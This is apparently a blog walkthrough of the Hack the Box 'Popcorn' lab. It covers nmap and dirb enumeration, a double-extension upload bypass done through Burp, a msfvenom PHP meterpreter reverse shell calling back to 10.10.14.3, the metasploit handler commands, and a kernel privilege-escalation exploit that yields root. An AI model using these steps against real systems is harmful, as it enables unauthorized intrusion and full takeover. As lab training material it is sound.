Hello friends!! Today we are going to solve another CTF challenge
“Popcorn”
which is available online for those who want to increase their skill in
penetration testing and black box testing. popcorn is retried vulnerable lab
presented by Hack the Box for making online penetration
practices according to your experience level, they have collection of
vulnerable labs as challenges from beginners to Expert level.
Level: Intermediate
Task: find user.txt
and root.txt
file in victim’s machine.
Since these labs are online available therefore they have static
IP and IP of sense is 10.10.10.6 so let’s begin with nmap port
enumeration.
nmap -A 10.10.10.6
From given below image, you can observe we found port 22,80 are
open in victim’s network.
Knowing port 80 is open in victim’s network we preferred to
explore his IP in browser but didn’t get any remarkable clue for the next step.
Next we have used dirb tool of kali to enumerate the
directories from using the IP Address. The command we have used is
dirb
http://10.10.10.6 . After checking most of the
directories, we finally decided to go for /torrent directory.
So next we decided to explore http://10.10.10.6/torrent/
through browser URL and what we see is a Webpage shown below. After looking at
the page for some clue, we saw that we need to register on this site first.
After
clicking on Register option on the
Webpage. The registration form opened is shown below. As you can see you need
give details to successfully register on this site.
After
successfully registering on the website. Click on Upload option and the
page opened is shown below. Now here we have given the path of any torrent file. Then Click on upload.
When
the torrent file is successfully uploaded the next page we are redirected to is
shown below. Now simply click on Edit
this torrent option.
Now
using metasploit we have created a payload in php by using command msfvenom –p php/meterpreter/reverse_tcp
lhost=10.10.14.3 lport=4321 –f raw .
Now
the problem we got was while we are uploading a php file in the update
screenshot option it was not taking a php
file. So what we did here is renamed the file with php.png which is 123.php.png . And Clicked on Submit Screenshot.
But
before clicking on submit screenshot we have captured the request of this page
using Burp Suite. Where you can see
our file with double extension has been successfully submitted.
As
you can see have edited the file name to 123.php.
Now Click on Forward option in burp
suite.
Next
we saw that our file has been successfully uploaded.
Next we have again used dirb tool of kali to enumerate the
directories from using the IP Address. The command we have used is
dirb
http://10.10.10.6/torrent/ . After checking most of the
directories, we finally decided to go for /torrent/upload/ directory.
So next we decided to explore http://10.10.10.6/torrent/upload/
through browser URL and what we see is a Webpage shown below. We see that our
file has been successfully uploaded. By click on the file we have uploaded.
We have used metasploit’s and got the meterpreter as you can see
below.
msf use exploit/multi/handler
msf
exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf
exploit(multi/handler) set lhost 10.10.14.3
msf
exploit(multi/handler) set lport 4321
msf
exploit(multi/handler) exploit
Once we have got the meterpreter. We have used command cd /home.
Than we check inside the george directory using command ls
/home/george, here we found out the user.txt file and read the
file content which contains our first FLAG!!
Now
have searched kernel explit on google , where we found that it is an exploit
which is used for getting Local privilege escalation. We have simply downloaded
the file on our Desktop.
As you can see we have uploaded using the command upload /root/Desktop/15704.c Now we
have used command shell to access
the root privilege. Now we have compiled.
Next we have given permission to the exploit. Using cd /root command we have found root.txt
file. And to view the contents we have used cat root.txt command. In the end we have found our Final FLAG!!
0 comments:
Post a Comment